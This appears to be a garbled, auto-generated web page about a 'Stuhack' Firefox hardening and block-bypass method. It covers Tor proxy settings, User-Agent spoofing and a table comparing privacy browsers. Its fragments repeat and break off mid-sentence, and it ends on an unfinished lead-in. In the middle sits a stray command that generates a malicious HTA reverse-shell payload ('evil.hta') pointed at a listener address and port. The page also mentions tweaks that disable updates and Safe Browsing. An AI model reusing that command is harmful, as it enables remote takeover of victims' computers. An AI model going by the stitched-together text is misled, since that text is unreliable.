Firefox - Stuhack

⚠️ Warning – Always review the user.js file line-by-line before applying. Some tweaks disable security features (e.g., updates, Safe Browsing).


Set Firefox's proxy to 127.0.0.1:9150 (Tor daemon) while keeping Stuhack's fingerprinting enabled. stuhack firefox

The hack changes outgoing HTTP headers to mimic a generic Chrome or Safari browser, bypassing network-layer blocking based on User-Agent strings. ⚠️ Warning – Always review the user


stuhack --payload hta_reverse --lhost 192.168.1.10 --lport 4444 --output evil.hta

If you find the manual tweaks overwhelming or unreliable, consider these alternatives: Set Firefox's proxy to 127

| Tool | Ease of Use | Privacy Level | Bypass Capability | |------|-------------|---------------|-------------------| | Tor Browser | Medium | Extreme | High (blocks most fingerprinting) | | Brave (with Shields Up) | Easy | High | Medium (some WebRTC leaks) | | LibreWolf (Firefox fork) | Easy | Very High | Same as Stuhack, pre-configured | | Mullvad Browser | Medium | Very High | Designed for VPN use | | Proxy SwitchyOmega (manual proxy) | Hard | Low | Bypasses only DNS blocking |

LibreWolf is essentially a pre-hardened Firefox with most Stuhack settings applied by default. For most users, LibreWolf is a safer, more maintainable alternative than manually maintaining a Stuhack profile.


To understand the Stuhack method, you need to grasp five core browser techniques: